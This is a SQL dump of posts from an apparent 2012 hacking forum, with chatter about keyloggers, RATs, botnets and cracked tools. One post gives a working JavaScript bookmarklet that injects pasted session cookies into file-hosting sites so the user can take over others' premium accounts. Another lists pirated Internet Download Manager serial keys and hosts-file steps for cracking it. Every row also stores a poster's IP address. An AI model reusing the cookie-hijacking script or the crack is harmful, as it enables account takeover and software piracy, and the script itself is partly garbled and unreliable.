theme you request.', '0', '1', 't3h jok3r', '1345244498', 'Thanks for the service vladjke.', '41.174.8.52', '699271220', '1', '0', '0', '0', '1', 'b99ba12a3988390d350cee78b3b57a80', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('387', '100', '240', '18', 'RE: [tut]Hack any facebook or account that use username ID and forum password', '0', '1', 't3h jok3r', '1345244915', 'Thanks, I don\'t have wifi so can\'t use it. Anyway, thanks for contributing.', '41.174.8.52', '699271220', '1', '0', '0', '0', '1', 'da4c0377b256b123e1cb0c1273dcef66', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('388', '146', '380', '29', 'RE: se7en sins PREMIUM SECTION', '0', '61', 'NXK', '1345245421', '[quote=\'Apathy\' pid=\'380\' dateline=\'1345243405\'] I this the old one or did you rip it? [/quote] It may be the old one, I got it from a friend like 3 months ago. Just thought Id share.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'bc38b70e7e49dedba9296f716d4f5182', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('389', '146', '388', '29', 'RE: se7en sins PREMIUM SECTION', '0', '1', 't3h jok3r', '1345245652', '[quote=\'NXK\' pid=\'388\' dateline=\'1345245421\'] [quote=\'Apathy\' pid=\'380\' dateline=\'1345243405\'] I this the old one or did you rip it? [/quote] It may be the old one, I got it from a friend like 3 months ago. Just thought Id share. [/quote] Who cares? At least it has free porn content :D', '41.174.8.52', '699271220', '1', '0', '0', '0', '1', '1b07cd841b563e740acbd039e8202521', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('390', '147', '0', '42', '[Hacker news] BOTNET -The hacker news magazine', '0', '61', 'NXK', '1345248954', 'Hello faithful readers and new comers to our magazine! We are very sorry to have missed publishing the July issue, however, we were busy at work putting on the THE HACKERS CONFERENCE in Delhi, India. We had a fantastic turn out and professional, informative speakers. We plan to have another conference on Internet Security in September next year and hope to see you there! For now, enjoy all the good information on Botnets in our August edition and thank you again for your continued support. http://news.thehackernews.com/THN-August2012.pdf Source http://thehackernews.com/2012/08/botnet-hacker-news-magazine-august-2012.html My thought\'s on this topic, Are that this is something very interesting read for people who maintain botnets, own botnets, Spreading whores and install sellers. It\'s very detailed and I love all the information Iv actually learned from this. On the origin of botnets things like that. Post a reply on what you though about it!', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '5f96db5f2857e2b2ce5617b2ca38f7ca', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('391', '140', '361', '19', 'RE: ???[Ebook] Earn 40$-60$ per day by doing a very simple job [Highly Vouched]???', '0', '54', 'Sin Cara', '1345263233', '[quote=\'Apathy\' pid=\'361\' dateline=\'1345220131\'] Could I get the vouch copy? Me and the joker are BFF. [/quote] no sorry for the vouch copy...', '119.154.21.195', '2006586819', '1', '0', '0', '0', '1', '076577d6ea1ca0c3fe39f9f519afb0e7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('392', '112', '383', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '54', 'Sin Cara', '1345263314', '[quote=\'Quietus2\' pid=\'383\' dateline=\'1345244215\'] Can u PM me? I want to download them. [/quote] PPD ebooks pack is sent... check your pm now.', '119.154.21.195', '2006586819', '1', '0', '0', '0', '1', 'cc4436e7160f90ea72ebe8693302cedf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('393', '136', '353', '53', 'RE: [Java] Minecraft Lastlogin Decrypter [Source]', '0', '54', 'Sin Cara', '1345263363', 'Thanks for the fix dear :)', '119.154.21.195', '2006586819', '1', '0', '0', '0', '1', '8a4bc646d596af8a8c1e832c00b6b6b9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('394', '137', '354', '13', 'RE: [TuT] How to exploit a vulnerable site', '0', '54', 'Sin Cara', '1345266412', 'Thanks for the feedback:)', '119.154.48.85', '2006593621', '1', '0', '0', '0', '1', 'a0653a4fd4dd2ffae1138f49e8fb7e39', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('395', '148', '0', '12', '[Tutorial]How to use Cookies and access Premium Accounts', '0', '54', 'Sin Cara', '1345268116', '[align=center][size=x-large][b]For Google Chrome[/b][/size] [size=large][[color=limegreen]?[/color]] Go to BookMark Manager [[color=limegreen]?[/color]] Organize -> Add Page [[color=limegreen]?[/color]] Name it whatever you want [[color=limegreen]?[/color]] Paste the JavaScript Code in URL [[color=limegreen]?[/color]] Then Save it [/size] [b][size=x-large]For Mozilla Firefox[/size][/b] [[size=large][color=limegreen]?[/color]] Go to Firefox -> BookMarks [[color=limegreen]?[/color]] Right Click -> New BookMarks [[color=limegreen]?[/color]] Name it whatever you want [[color=limegreen]?[/color]] Paste the JavaScript Code in Location [[color=limegreen]?[/color]] Then Save it [/size][/align][align=center][size=large]The Full javascript is given below:[/size][/align][align=center] [quote]javascript:hf=location.hostname;if(hf==\"depositfiles.com\"||hf==\"www.depositfiles.com\"){coo=\"autologin\";dom=\".depositfiles.com\";}else if(hf==\"easy-share.com\"||hf==\"www.easy-share.com\"){coo=\"PREMIUM\";dom=\".easy-share.com\";}else if(hf==\"filefactory.com\"||hf==\"www.filefactory.com\"){coo=\"ff_membership\";dom=\".filefactory.com\";}else if(hf==\"alldebrid.com\"||hf==\"www.alldebrid.com\"){coo=\"uid\";dom=\".alldebrid.com\";}else if(hf==\"alldebrid.org\"||hf==\"www.alldebrid.org\"){coo=\"uid\";dom=\".alldebrid.org\";}else if(hf==\"fileserve.com\"||hf==\"www.fileserve.com\"){coo=\"PHPSESSID\";dom=\".fileserve.com\";}else if(hf==\"filesonic.in\"||hf==\"www.filesonic.in\"){coo=\"PHPSESSID\";dom=\".filesonic.in\";}else if(hf==\"filesonic.com\"||hf==\"www.filesonic.com\"){coo=\"PHPSESSID\";dom=\".filesonic.com\";}else if(hf==\"hotfile.com\"||hf==\"www.hotfile.com\"){coo=\"auth\";dom=\".hotfile.com\";}else if(hf==\"uploading.com\"||hf==\"www.uploading.com\"){coo=\"remembered_user\";dom=\".uploading.com\";}else if(hf==\"megaupload.com\"||hf==\"www.megaupload.com\"){coo=\"user\";dom=\".megaupload.com\";}else if(hf==\"megavideo.com\"||hf==\"www.megavideo.com\"){coo=\"user\";dom=\".megavideo.com\";}else if(hf==\"rapidshare.com\"||hf==\"www.rapidshare.com\"){coo=\"enc\";dom=\".rapidshare.com\";}else if(hf==\"netload.in\"||hf==\"www.netload.in\"){coo=\"cookie_user\";dom=\".netload.in\";}else if(hf==\"4shared.com\"||hf==\"www.4shared.com\"){coo=\"PHPSESSID\";dom=\".4shared.com\";}else if(hf==\"oron.com\"||hf==\"www.oron.com\"){coo=\"xfss\";dom=\".oron.com\";}else if(hf==\"wupload.com\"||hf==\"www.wupload.com\"){coo=\"PHPSESSID\";dom=\".wupload.com\";}else if(hf==\"real-debrid.fr\"||hf==\"www.real-debrid.fr\"){coo=\"auth\";dom=\".real-debrid.fr\";}else if(hf==\"real-debrid.com\"||hf==\"www.real-debrid.com\"){coo=\"auth\";dom=\".real-debrid.com\";}else if(hf==\"uploadstation.com\"||hf==\"www.uploadstation.com\"){coo=\"PHPSESSID\";dom=\".uploadstation.com\";}else if(hf==\"turbobit.net\"||hf==\"www.turbobit.net\"){coo=\"kohanasession\";dom=\".turbobit.net\";}else if(hf==\"debridmax.com\"||hf==\"www.debridmax.com\"){coo=\"PHPSESSID\";dom=\".www.debridmax.com\";}else if(hf==\"fast-debrid.com\"||hf==\"www.fast-debrid.com\"){coo=\"PHPSESSID\";dom=\".www.fast-debrid.com\";}else if(hf==\"mega-debrid.eu\"||hf==\"www.mega-debrid.eu\"){coo=\"PHPSESSID\";dom=\".www.mega-debrid.eu\";}else if(hf==\"uploaded.to\"||hf==\"www.uploaded.to\"){coo=\"login\";dom=\".uploaded.to\";}else{alert(\"Site not supported please try again!\")+fonction.close;}c=prompt(\"Enter a cookie on \"+hf+\" if(hf==\"uploadstation.com\"||hf==\"www.uploadstation.com\"){coo=\"PHPSESSID\";ho=\".uploadstation.com\";}else if(hf==\"turbobit.net\"||hf==\"www.turbobit.net\"){coo=\"kohanasession\";ho=\".turbobit.net\";}else if(hf==\"debridmax.com\"||hf==\"www.debridmax.com\"){coo=\"PHPSESSID\";ho=\".www.debridmax.com\";}else if(hf==\"fast-debrid.com\"||hf==\"www.fast-debrid.com\"){coo=\"PHPSESSID\";ho=\".www.fast-debrid.com\";}else if(hf==\"mega-debrid.eu\"||hf==\"www.mega-debrid.eu\"){coo=\"PHPSESSID\";ho=\".www.mega-debrid.eu\";}if(c!==\"\"||c!==null+fonction.close)if(c.length < 70 && hf==\"uploaded.to\"){coo=\"PHPSESSID\";ho=\".uploaded.to\";}if(c!==\"\"||c!==null+fonction.close){r=d=new Date();nd=new Date(d.getFullYear()+2,2 ,11);void(document.cookie=coo+\"=\"+c+\";domain=\"+dom+\";path=/;\"+(r?\"expires=\"+nd:\"\"));location.reload(true);}if(c!==\"\"||c!==null+fonction.close){r=d=new Date();nd=new Date(d.getFullYear()+2,2 ,11);void(document.cookie=coo+\"=\"+c+\";host=\"+ho+\";path=/;\"+(r?\"expires=\"+nd:\"\"));location.reload(true);} [/quote][/align][align=center] [b][size=x-large]How to use: [/size][/b] [size=large][b][[color=limegreen]?[/color]][/b] Goto Any Filehosting [b][[color=limegreen]?[/color]][/b] Click the BookMarked page [b][[color=limegreen]?[/color]][/b] It Will Ask to enter the Cookies [b][[color=limegreen]?[/color]][/b] Enter it and Click Ok [b][[color=limegreen]?[/color]][/b] Done [/size] [/align][align=center][size=x-large][b]Supported Filehosting Sites by this Code:[/b] [/size][/align][align=center][size=large][[color=limegreen]?[/color]] [/size][b][size=large]Deposit Files[/size][/b] [size=large][[color=limegreen]?[/color]] [/size][b][size=large]easy-share[/size][/b] [size=large][[color=limegreen]?[/color]] [/size][b][size=large]filefactory[/size][/b] [size=large][[color=limegreen]?[/color]] [/size][b][size=large]alldebrid[/size][/b] [size=large][[color=limegreen]?[/color]] [/size][b][size=large]fileserve[/size][/b] [size=large][[color=limegreen]?[/color]] [/size][b][size=large]filesonic[/size][/b] [size=large][[color=limegreen]?[/color]] [/size][b][size=large]hotfile[/size][/b] [size=large][[color=limegreen]?[/color]] [/size][b][size=large]uploading[/size][/b] [size=large][[color=limegreen]?[/color]] [/size][b][size=large]megaupload[/size][/b] [size=large][[color=limegreen]?[/color]] [/size][b][size=large]megavideo[/size][/b] [size=large][[color=limegreen]?[/color]] [/size][b][size=large]rapidshare[/size][/b] [size=large][[color=limegreen]?[/color]] [/size][b][size=large]netload[/size][/b] [size=large][[color=limegreen]?[/color]] [/size][b][size=large]4shared[/size][/b] [size=large][[color=limegreen]?[/color]] [/size][b][size=large]oron[/size][/b] [size=large][[color=limegreen]?[/color]] [/size][b][size=large]wupload[/size][/b] [size=large][[color=limegreen]?[/color]] [/size][b][size=large]real-debrid[/size][/b] [size=large][[color=limegreen]?[/color]] [/size][b][size=large]uploadstation[/size][/b] [size=large][[color=limegreen]?[/color]] [/size][b][size=large]debridmax[/size][/b] [size=large][[color=limegreen]?[/color]] [/size][b][size=large]fast-debrid[/size][/b] [size=large][[color=limegreen]?[/color]] [/size][b][size=large]mega-debrid[/size][/b] [size=large][[color=limegreen]?[/color]] [/size][b][size=large]uploaded[/size][/b] [size=large][[color=limegreen]?[/color]] [/size][b][size=large]turbobit[/size][/b] [size=large][[color=limegreen]?[/color]] [/size][b][size=large]debridmax[/size][/b][/align] [color=#DAA520][size=medium][b]Credits to :[/b][/size][/color] VirtualHack3r', '196.28.57.72', '-1004783288', '1', '0', '54', '1345268180', '1', '0298101d4e45714070926b709d6fa498', '0', '1345268180'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('396', '149', '0', '12', 'How to crack your Internet Download Manager forever', '0', '54', 'Sin Cara', '1345268332', 'This tutorial will allow you to register your Internet Download Manager (IDM) to a lifetime version. It mean that you don\'t have to patch it again and again each time you updates the program to a latest version which is seriously very annoying. Here how you do it. First register your IDM if you are using the trial version use one of the following serial key. Code: RLDGN-OV9WU-5W589-6VZH1 HUDWE-UO689-6D27B-YM28M UK3DV-E0MNW-MLQYX-GENA1 398ND-QNAGY-CMMZU-ZPI39 GZLJY-X50S3-0S20D-NFRF9 W3J5U-8U66N-D0B9M-54SLM EC0Q6-QN7UH-5S3JB-YZMEK UVQW0-X54FE-QW35Q-SNZF5 FJJTJ-J0FLF-QCVBK-A287M Simply use any random name and email as you wish then click register. It will detected as a fake serial click on exit. Now go to run or press Window + R button and key in the following code. Code: notepad %windir%\\system32\\drivers\\etc\\hosts and hit enter. A text file \"hosts\" will pop up. If you don\'t have permission to access it simply locate the file here. My Computer > C: > Windows > System32 > drivers > etc and now right click and open the \"hosts\" file using notepad. If you can\'t just run it as admin or give full permission under its properties. Now add the following code at the end of the text [img]http://i.min.us/iej2wC.jpg[/img] Code: 127.0.0.1 tonec.com 127.0.0.1 www.tonec.com 127.0.0.1 registeridm.com 127.0.0.1 www.registeridm.com 127.0.0.1 secure.registeridm.com 127.0.0.1 internetdownloadmanager.com 127.0.0.1 www.internetdownloadmanager.com 127.0.0.1 secure.internetdownloadmanager.com 127.0.0.1 mirror.internetdownloadmanager.com 127.0.0.1 mirror2.internetdownloadmanager.com Now save and exit. You can now run your IDM and it will be fully registered. You don\'t have to re-patch again the next time you apply/install a newer version and it will stay full version forever! [img]http://i.min.us/ienZFE.jpg[/img] Note that this will block the communication form IDM server therefore you will not be able to check for updates. If you want to use the check for update option simply edit the \"hosts\" file and remove the code that have been added previously form it. [color=#00ff00][size=medium][b]Credits to CoolCrackerz.[/b][/size][/color]', '196.28.57.72', '-1004783288', '1', '0', '0', '0', '1', '57315c8ec9c7a09f49ee06ac92774b71', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('397', '135', '345', '43', 'RE: Astro Pid [free4all] mediafire', '0', '54', 'Sin Cara', '1345275298', 'Please post a virus scan before posting any tool.', '196.28.57.72', '-1004783288', '1', '0', '0', '0', '1', '081cda28bbc5759acf470161c5e46a67', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('398', '150', '0', '12', '[TuT] Easiest Way To Portfoward (For RAT\'s)', '0', '54', 'Sin Cara', '1345282396', '[b][size=medium][color=#1E90FF]Easiest Way To Portforward (For RAT\'s)[/color] [/size][/b] [b]What you will need[/b] Skype Now Open up skype Log in Once it has logged in it should look like the picture down below, go up to tools and click options [img]http://i.imgur.com/Shcww.png[/img] [img]http://i.imgur.com/2k3xR.png[/img] Next Click Advanced [img]http://i.imgur.com/emHRU.png[/img] Now click connection [img]http://i.imgur.com/LfIh1.png[/img] Where it says use port, put in your desired port that you want. [color=#1E90FF]Disclaimer:[/color] Pictures+Tutorial from D4wn', '119.154.49.43', '2006593835', '1', '0', '0', '0', '1', '808f9e028f8bb75b6e247b1072b7da4d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('399', '151', '0', '24', 'Windows 8/Ubuntu/Android Themes For XP, Vista, Win7 x32 & x64', '0', '54', 'Sin Cara', '1345282815', '[align=center][b][size=xx-large][color=#4682B4][u]Windows 8 Skin pack 6.0[/u][/color][/size][/b][/align] [align=center][img]http://th07.deviantart.net/fs70/PRE/i/2011/260/4/7/8_skin_pack_6_0_x86_by_hameddanger-d4a5uxv.jpg[/img][/align] [align=center][i][size=large][color=#FFA500]Transform Windows 7 to Windows 8 build 8102 M3 Download online version with auto fix bugs: (recommended) 7X86: [[url=http://www.deviantart.com/users/outgoing?http://www.bigspeedpro.com/mirror2/lionskin/8SkinPack.exe]Link[/url]] 7X64: [[url=http://www.deviantart.com/users/outgoing?http://www.bigspeedpro.com/mirror2/lionskin/8SkinPack64.exe]Link[/url]] XP: [[url=http://www.deviantart.com/users/outgoing?http://www.bigspeedpro.com/mirror2/lionskin/8SkinPackXP.exe]Link[/url]][/color][/size][/i][/align] [align=center][b][size=xx-large][color=#4682B4][u]ubuntu skin pack 7.0[/u][/color][/size][/b][/align] [align=center][img]http://th05.deviantart.net/fs70/PRE/i/2011/255/5/5/ubuntu_skin_pack_7_0_x86_by_hameddanger-d49pe01.jpg[/img][/align] [align=center][size=large][color=#FFA500]X86: [[url=http://www.deviantart.com/users/outgoing?http://www.bigspeedpro.com/mirror2/lionskin/UbuntuSkinPack.exe]Link[/url]] X64: [[url=http://www.deviantart.com/users/outgoing?http://www.bigspeedpro.com/mirror2/lionskin/UbuntuSkinPack64.exe]Link[/url]] XP: [[url=http://www.deviantart.com/users/outgoing?http://www.bigspeedpro.com/mirror2/lionskin/UbuntuSkinPackXP.exe]Link[/url]][/color][/size][/align] [align=center][b][size=xx-large][color=#4682B4][u]Android Skin Pack 1.0[/u][/color][/size][/b][/align] [align=center][img]http://th09.deviantart.net/fs71/PRE/i/2011/275/8/e/android_skin_pack_1_0_x64_by_hameddanger-d4bk74s.jpg[/img][/align] [align=center][size=large][color=#ffa500]Transform Windows 7 To Android Download online installer with auto fix bugs: (recommended) 32 bit: [[url=http://www.deviantart.com/users/outgoing?http://www.bigspeedpro.com/mirror2/lionskin/AndroidSkinPack.exe]Link[/url]] 64 bit: [[url=http://www.deviantart.com/users/outgoing?http://www.bigspeedpro.com/mirror2/lionskin/AndroidSkinPack64.exe]Link[/url]] [color=#ff0000][b]Credits to :[/b][/color] [/color][/size][b]G-Star Raw[/url][/b] [/align]', '119.154.49.43', '2006593835', '1', '0', '54', '1345282865', '1', '7d231053703d891568293b491249641b', '0', '1345282865'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('400', '152', '0', '30', '[Free] Magic Traffic Bot! [Worth $29.99]', '0', '54', 'Sin Cara', '1345283359', '[align=center] [img]http://www.magictrafficbot.com/images/m01b.gif[/img] [img]http://www.magictrafficbot.com/images/m02b.gif[/img] [img]http://www.magictrafficbot.com/images/m03b.gif[/img] [color=#ff0000][font=Impact][size=x-large]Original Sales Thread[/size][/font][/color] http://www.magictrafficbot.com/ [img]http://www.minervity.com/wp-content/uploads/2009/04/download-button-transparent2.png[/img] [url=http://www.mediafire.com/?315ictp2tbjkpg8][b][color=#00ff00][size=x-large]Click Here[/size][/color][/b][/url] [/align]', '119.154.49.43', '2006593835', '1', '0', '54', '1345283727', '1', '0bd927a32c47f5ba90d28f35007237d6', '0', '1345283727'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('401', '153', '0', '34', '[TUT] How to Render SMOKE and FIRE in Seconds', '0', '54', 'Sin Cara', '1345283932', '[align=center][img]http://i.imgur.com/Bwx2p.png[/img] [size=x-large][b][color=#00ff00]100%[/color] [color=#ff0000]Credits[/color] [color=#00ff00]to[/color]Vibrant[/b][/size] [/align]', '119.154.49.43', '2006593835', '1', '0', '54', '1345286961', '1', '0095b381c30d428c27f0706f3b026bd1', '0', '1345286961'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('402', '145', '374', '30', 'RE: Stealers/Keyloggers', '0', '54', 'Sin Cara', '1345287395', 'I don\'t use key loggers but its good share :)', '119.154.49.43', '2006593835', '1', '0', '0', '0', '1', '6de24216084584fe6c64dfb03422d9b7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('403', '31', '86', '7', 'RE: How long are you online daily?', '0', '67', 'HoverCatz', '1345301728', 'um like 16 daily .', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '712344a897e5c84b5b0eba314bd563fe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('404', '99', '237', '3', 'RE: [Previews added]New theme for LH', '0', '62', 'R?????zo?', '1345306489', 'It does looks cool indeed, if you need any help with GFX I will be glad to help :)', '89.214.229.102', '1507255654', '1', '0', '0', '0', '1', '92a9da59f2e54e5ddb303160c4de510c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('405', '110', '278', '4', 'RE: It\'s Baws...the Baws', '0', '55', 'Baws', '1345328414', 'Thanks guys. [quote=\'t3h jok3r\' pid=\'278\' dateline=\'1344993832\'] Welcome to L33T Hacking. Thanks for signing up. So Mr. Baws, mind sharing what hacking skills you have? [/quote] Well, I can RAT/Keylogg/DDoS(hack?) and what else is there?', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'dc8c78974df37e4afd6b5215aa3a5c53', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('406', '99', '237', '3', 'RE: [Previews added]New theme for LH', '0', '55', 'Baws', '1345328463', 'Looks nice, matches your signature. :P', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'a12a85b3a38a09acb4e48315941fa67f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('407', '145', '374', '30', 'RE: Stealers/Keyloggers', '0', '55', 'Baws', '1345328525', 'Yeah I don\'t use these, but thanks for the share. Looks like you got lots of programs/files.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '50ddc1c1a6f168a43eb3725c83d8f842', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('408', '153', '401', '34', 'RE: [TUT] How to Render SMOKE and FIRE in Seconds', '0', '55', 'Baws', '1345328579', 'I\'ll try this sometime later, thanks. Also, the SkyWalker sig looks sick.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '1cf9a7352a39be2889eae90721bc58f3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('409', '141', '368', '9', 'RE: $30 per day ? Ne invest ? Do nothing ? Autopilot ? Very Easy ?', '0', '55', 'Baws', '1345328738', 'Thanks for the share, I\'ll try this out. Alright I got about 40 points ATM, lol. What sites do you suggest using? I got 7 tabs right now, yahoo-msn-milliondollarhomepage-youtube-aol-ebay', '98.176.49.100', '1655714148', '0', '0', '55', '1345330207', '1', '9186c12a74a33f83797b28dfb3563b84', '0', '1345330207'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('410', '99', '406', '3', 'RE: [Previews added]New theme for LH', '0', '1', 't3h jok3r', '1345329245', '[quote=\'Baws\' pid=\'406\' dateline=\'1345328463\'] Looks nice, matches your signature. :P [/quote] Lol, it sure does. I keep this signature because I wanted it to match the theme but it seems to be a bit too big.', '41.174.14.146', '699272850', '1', '0', '0', '0', '1', '1688dc1156fa2dc0292278dc5b439981', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('411', '31', '86', '7', 'RE: How long are you online daily?', '0', '1', 't3h jok3r', '1345329296', '16 DAMN, or is it 16 only in summer vacation?', '41.174.14.146', '699272850', '1', '0', '0', '0', '1', 'c318b416ef2adb137ff560e04d3c6b6d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('412', '135', '345', '43', 'RE: Astro Pid [free4all] mediafire', '0', '1', 't3h jok3r', '1345329528', 'Tested and it works. The OP has a vouch from me so this download is clean. Also I have used this PID generator before, I love it.', '41.174.14.146', '699272850', '1', '0', '0', '0', '1', 'd0821d0d6c7a1d748772114708fd49aa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('413', '149', '396', '12', 'RE: How to crack your Internet Download Manager forever', '0', '1', 't3h jok3r', '1345329599', 'So does this only work with WIFI or all kinds of internet?', '41.174.14.146', '699272850', '1', '0', '0', '0', '1', 'dbd0c8776cf40248b3a7678b99026a31', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('414', '153', '401', '34', 'RE: [TUT] How to Render SMOKE and FIRE in Seconds', '0', '5', 'Timmy', '1345329805', 'Damn, I love the picture. It looks bad ass.', 